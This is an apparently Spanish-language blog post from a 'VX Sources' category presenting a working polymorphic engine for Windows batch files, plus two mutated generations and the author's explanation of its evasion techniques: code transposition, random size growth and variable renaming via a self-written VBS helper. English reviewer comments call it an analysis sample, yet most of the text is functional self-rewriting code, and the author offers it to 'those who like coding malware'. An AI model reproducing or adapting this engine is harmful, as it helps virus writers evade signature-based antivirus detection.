Motor polimorfico para scripts batch
::Polimorphic Engine by lShadowl %ini%
:: Reviewer notes (defender view). This is a self-rewriting batch file with
:: no payload of its own; it is kept here as an analysis sample. When run it:
::   - prints "Mutando..." to the console,
::   - creates a scratch file literally named "$" in the current directory,
::   - writes a helper script "asjdhau.vbs" next to it (nothing below deletes
::     either file),
::   - overwrites its own file (the path in argument 0) with the contents of "$",
::   - spawns "ping -n 1 localhost" (apparently as a short delay),
::   - then runs asjdhau.vbs, which rewrites this file once more, and exits.
:: Across generations (compare the two mutated copies further down) the .vbs
:: name, the identifiers inside it, the labels and the "Mutando..." string stay
:: constant; only the four batch variable names, the block order between the
:: two CODIGO POLIMORFICO markers and the random junk comment lines change.
:: Only lines that end with a tag (the percent-delimited word at the end of
:: every original line) survive a rewrite, so these untagged notes are
:: dropped on the first run.
@set sdjf=fictsoehnd %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%egnkv%off %ini%
@%agnvl: =%local enabledelayedexpansion %ini%
:: The four variables above hold "fictsoehnd" and, sliced out of it, the
:: commands "set", "echo" and "find" (see the author's explanation below);
:: they are the names the .vbs helper renames on every run.
%egnkv%Mutando... %ini%
:: Step 1: copy this script's lines that carry the first tag into "$".
%fsdhf%"ini"<%0>$ %ini%
:: Step 2: draw a random digit 0-9; if that tagged block is not yet in "$",
:: append it from this script plus one junk comment line carrying a random
:: number, then check which of the ten blocks are still missing.
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%fsdhf%"m%r: =%"<%0>>$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
:: Builds a string of ten o/x flags (o = block still missing); any "o" means
:: draw again, so the ten blocks end up in "$" in a random order.
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%egnkv%%a%|%fsdhf% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
:: Step 3: append the two subroutine blocks (tagged at the bottom) in fixed
:: order, then replace this script with "$".
for %%a in (cmp rnd) do (set a=%%a %ini%
%fsdhf%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
:: Step 4: write asjdhau.vbs, which re-reads this file, makes four random
:: 5-letter lowercase names, substitutes them for the four variable names
:: used above and writes the file back. Its file name and variable names are
:: not randomized.
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%egnkv%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%egnkv%kdflekj.close>>asjdhau.vbs %ini%
%egnkv%Randomize>>asjdhau.vbs %ini%
%egnkv%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%sjdfhjs = Replace(askdajs,"sdjf",ahqiaohe)>>asjdhau.vbs %ini%
%egnkv%lasdaod = Replace(sjdfhjs,"agnvl",jdfasuu)>>asjdhau.vbs %ini%
%egnkv%skdnmxi = Replace(lasdaod,"egnkv",dwudhqw)>>asjdhau.vbs %ini%
%egnkv%sjsabwu = Replace(skdnmxi,"fsdhf",asdwdkw)>>asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: Movable blocks: their order between the two markers changes every run and
:: the junk lines appended above accumulate inside them.
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
:: %m7%
:: %m6%
:: %m1%
:: %m2%
:: %m4%
:: %m9%
:: %m3%
:: %m0%
:: %m8%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:: Subroutine: appends "o" to a when the block for the digit passed as the
:: first argument is not yet in "$", otherwise "x".
:cmp %mcmp%
%fsdhf%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%agnvl% a=%a%o %mcmp%
goto :EOF)%mcmp%
%agnvl% a=%a%x %mcmp%
goto :EOF %mcmp%
:: Subroutine: r = a random digit 0-9.
:rnd %mrnd%
%agnvl%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
Para ver cómo funciona, os pondré las variantes del código que resultan después de haberlo ejecutado dos veces:
::Polimorphic Engine by lShadowl %ini%
@set pkseh=fictsoehnd %ini%
@set cneso=%pkseh:~4,1%%pkseh:~6,1%%pkseh:~3,1% %ini%
@%cneso%hfdjc=%pkseh:~6,1%%pkseh:~2,1%%pkseh:~7,1%%pkseh:~5,1% %ini%
@%cneso%vchff=%pkseh:~0,2%%pkseh:~8,2% %ini%
@%hfdjc%off %ini%
@%cneso: =%local enabledelayedexpansion %ini%
%hfdjc%Mutando... %ini%
%vchff%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%vchff%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%vchff%"m%r: =%"<%0>>$ %ini%
%cneso%/a rdnmm=%random%*9999999 %ini%
%hfdjc%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%cneso%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%hfdjc%%a%|%vchff% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%vchff%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
%hfdjc%%cneso%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%hfdjc%%cneso%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%hfdjc%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%hfdjc%kdflekj.close>>asjdhau.vbs %ini%
%hfdjc%Randomize>>asjdhau.vbs %ini%
%hfdjc%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%sjdfhjs = Replace(askdajs,"pkseh",ahqiaohe)>>asjdhau.vbs %ini%
%hfdjc%lasdaod = Replace(sjdfhjs,"cneso",jdfasuu)>>asjdhau.vbs %ini%
%hfdjc%skdnmxi = Replace(lasdaod,"hfdjc",dwudhqw)>>asjdhau.vbs %ini%
%hfdjc%sjsabwu = Replace(skdnmxi,"vchff",asdwdkw)>>asjdhau.vbs %ini%
%hfdjc%%cneso%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%hfdjc%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
::-1313031124 %m5%
:: %m1%
::2020451641 %m1%
:: %m8%
::-1739870728 %m8%
:: %m7%
::-443934897 %m7%
:: %m3%
::-1117740673 %m3%
:: %m2%
::-888192539 %m2%
:: %m0%
::1245290346 %m0%
:: %m6%
::-1909547966 %m6%
:: %m4%
::-1847546953 %m4%
:: %m9%
::191549157 %m9%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%vchff%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%cneso% a=%a%o %mcmp%
goto :EOF)%mcmp%
%cneso% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%cneso%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
::Polimorphic Engine by lShadowl %ini%
@set kjefv=fictsoehnd %ini%
@set eiotf=%kjefv:~4,1%%kjefv:~6,1%%kjefv:~3,1% %ini%
@%eiotf%gugip=%kjefv:~6,1%%kjefv:~2,1%%kjefv:~7,1%%kjefv:~5,1% %ini%
@%eiotf%mgvmh=%kjefv:~0,2%%kjefv:~8,2% %ini%
@%gugip%off %ini%
@%eiotf: =%local enabledelayedexpansion %ini%
%gugip%Mutando... %ini%
%mgvmh%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%mgvmh%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%mgvmh%"m%r: =%"<%0>>$ %ini%
%eiotf%/a rdnmm=%random%*9999999 %ini%
%gugip%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%eiotf%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%gugip%%a%|%mgvmh% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%mgvmh%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
%gugip%%eiotf%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%gugip%%eiotf%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%gugip%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%gugip%kdflekj.close>>asjdhau.vbs %ini%
%gugip%Randomize>>asjdhau.vbs %ini%
%gugip%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%sjdfhjs = Replace(askdajs,"kjefv",ahqiaohe)>>asjdhau.vbs %ini%
%gugip%lasdaod = Replace(sjdfhjs,"eiotf",jdfasuu)>>asjdhau.vbs %ini%
%gugip%skdnmxi = Replace(lasdaod,"gugip",dwudhqw)>>asjdhau.vbs %ini%
%gugip%sjsabwu = Replace(skdnmxi,"mgvmh",asdwdkw)>>asjdhau.vbs %ini%
%gugip%%eiotf%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%gugip%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m7%
::-443934897 %m7%
::525484065 %m7%
:: %m1%
::2020451641 %m1%
::-2018256975 %m1%
:: %m9%
::191549157 %m9%
::1635032111 %m9%
:: %m2%
::-888192539 %m2%
::1875225734 %m2%
:: %m3%
::-1117740673 %m3%
::1975806665 %m3%
:: %m0%
::1245290346 %m0%
::-39677251 %m0%
:: %m8%
::-1739870728 %m8%
::-568902610 %m8%
:: %m6%
::-1909547966 %m6%
::-1999741604 %m6%
:: %m4%
::-1847546953 %m4%
::1442194522 %m4%
:: %m5%
::-1313031124 %m5%
::-1207869762 %m5%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%mgvmh%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%eiotf% a=%a%o %mcmp%
goto :EOF)%mcmp%
%eiotf% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%eiotf%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
Como se puede ver, el código demuestra el uso de las técnicas de:
transposición de código: nótese cómo cambia, de una ejecución a otra, el orden de las líneas comprendidas entre “:: CODIGO POLIMORFICO [INICIO] %ini%” y “:: CODIGO POLIMORFICO [FIN] %mcmp%”.
incremento de tamaño: después de cada ejecución el código cambia de tamaño, creciendo un número aleatorio de bytes al añadir líneas como “::-1739870728 %m8%”.
variables aleatorias: nótese que las cuatro primeras variables, que se declaran en:
@set sdjf=fictsoehnd %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
o sea, sdjf, agnvl, egnkv y fsdhf, que contienen las cadenas “fictsoehnd”, “set”, “echo” y “find”, cambian de nombre en cada ejecución del programa por medio de un sencillo script en VBS (asjdhau.vbs) que el propio batch escribe y ejecuta al final.
Para los que les gusta codear malware, esto les puede servir de algo.
Saludos!
Estás leyendo “Motor polimorfico para scripts batch,” una entrada de SSW
- Publicado:
- septiembre 12, 2009 / 11:39 pm
- Categoría:
- VX Sources
- Etiquetas:
- batch, lShadowl, motor, polimorfico, polimorfismo, script, The Shadow, virus